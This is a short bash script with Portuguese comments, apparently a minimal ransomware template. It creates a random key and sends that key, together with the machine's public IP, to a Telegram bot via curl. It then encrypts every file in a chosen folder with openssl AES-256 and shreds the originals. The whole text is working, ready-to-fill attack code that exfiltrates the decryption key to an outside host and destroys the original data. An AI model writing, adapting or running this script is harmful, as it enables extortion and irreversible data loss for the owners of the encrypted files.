#!/bin/bash
# Salva na variável SIMETRIC a chave a ser utilizada
simetric=$(/usr/bin/dbus-uuidgen)
# Envia a chave e o IP externo da máquina para o telegram
curl -s -o /dev/null "https://api.telegram.org/bot<YoutBOTToken>/sendMessage?chat_id=<channel_id>&text=$(dig @resolver4.opendns.com myip.opendns.com +short) - $simetric"
# Loop dentro da pasta a ser criptografada
for file in <folder to be encrypted>
do
# Criptografa os arquivos utilizando a chave
openssl enc -aes256 -k $simetric -a -e -in $file -out $file".enc"
# Remove o aquivo original
shred -fz $file
done
